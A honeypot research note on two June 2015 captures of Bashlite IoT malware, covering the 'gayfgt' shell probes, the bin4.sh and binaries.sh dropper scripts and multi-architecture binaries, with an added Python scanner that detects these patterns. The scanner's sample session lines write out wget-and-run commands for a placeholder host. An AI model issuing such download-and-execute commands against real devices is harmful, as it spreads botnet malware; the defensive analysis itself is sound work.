IoTPOT captures new binaries of Bashlite family

[bin 55 to bin 67 of Table 1]
Created June 16, 2015


Bashlite Family [bin 55 to 62 of Table 1]

On June 4 and 8, 2015, IoTPOT captured new malware binaries of the “Bashlite” family designed to run on 7 different CPU architectures [X86, ARM, MIPS, MIPSEL, PowerPC, SuperH, SPARC]. After a successful login, the attacker checks whether the shell can be used by echoing '\x67\x61\x79\x66\x67\x74', which decodes to “gayfgt” in any type of shell, and then downloads a shell script named “bin4.sh”. Using the downloaded shell script, the attacker kills previously running malicious processes, downloads malware binaries for the 7 CPU architectures, and tries to run all of them. The infection process is the same as for previously captured binaries of the Bashlite family; this time, only the names of the downloading script and the downloaded binaries are changed. Within 2 days, IoTPOT detected this infection twice, from 2 IP addresses. By sandbox analysis, these new binaries are now scanning on port 23 [as of June 15, 2015].


Figure 1 - Downloaded binaries

Bashlite Family [bin 63 to 67 of Table 1]

On June 12, 2015, IoTPOT captured another new binary of the “Bashlite” family, designed to run on 5 different CPU architectures [ARM, MIPS, MIPSEL, PowerPC, SuperH]. After a successful login, the attacker downloads a shell script named “binaries.sh”, shown in Figure 2. Using the downloaded shell script, the attacker downloads malware binaries for the 5 CPU architectures, as shown in Figure 3, and tries to run all of them. Finally, the attacker makes sure that the current shell is BusyBox by echoing '\147\141\171\146\147\164', which decodes to “gayfgt” only in the BusyBox shell. This time, the infection process differs slightly from the previous Bashlite families, although the binaries share similar strings with the previous ones. Within 3 days, IoTPOT detected this infection 760 times, from 8 IP addresses. By sandbox analysis, these new binaries are now in the PING/PONG stage with the C&C server [as of June 15, 2015].
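As an added illustration (not IoTPOT's own code), the following Python scanner decodes both escape forms of the shell probe seen in the two captures above (hex in the first, octal in the second), compares the decoded value against the expected “gayfgt” marker, and flags the dropper script names “bin4.sh” and “binaries.sh” in honeypot session lines. The session lines and download host are constructed placeholders, not captured data.

```python
import re

# Constructed sample session lines modelled on the two Bashlite variants
# described on this page; not real IoTPOT capture data. The download
# host is a placeholder, not a real indicator.
SESSION_LINES = [
    r"echo -e '\x67\x61\x79\x66\x67\x74'",
    r"cd /tmp; wget http://HOST-PLACEHOLDER/bin4.sh; sh bin4.sh",
    r"echo -e '\147\141\171\146\147\164'",
    r"wget http://HOST-PLACEHOLDER/binaries.sh; sh binaries.sh",
    r"cat /proc/cpuinfo",
]

# Marker both variants expect the shell to echo back, and the dropper
# script names the page reports for each variant.
EXPECTED_MARKER = "gayfgt"
KNOWN_SCRIPTS = {"bin4.sh", "binaries.sh"}

ECHO_RE = re.compile(r"""echo\s+(?:-e\s+)?['"]([^'"]*)['"]""")
ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\([0-7]{1,3})")
SCRIPT_RE = re.compile(r"/([\w.-]+\.sh)\b")


def decode_echo_escapes(text):
    r"""Expand \xHH (hex) and \NNN (octal) escapes the way an
    escape-aware echo would, so the marker can be compared decoded."""
    def expand(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8))
    return ESCAPE_RE.sub(expand, text)


def scan_session(lines):
    """Return (kind, detail) findings for one honeypot session."""
    findings = []
    for line in lines:
        m = ECHO_RE.search(line)
        if m:
            raw = m.group(1)
            if decode_echo_escapes(raw) == EXPECTED_MARKER:
                style = "hex" if "\\x" in raw else "octal"
                findings.append(("shell_probe", style))
        for name in SCRIPT_RE.findall(line):
            if name in KNOWN_SCRIPTS:
                findings.append(("dropper_script", name))
    return findings


if __name__ == "__main__":
    for kind, detail in scan_session(SESSION_LINES):
        print(kind, detail)
```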


Figure 2 - Inside of “binaries.sh” file

Figure 3 - Sample of downloaded shell script
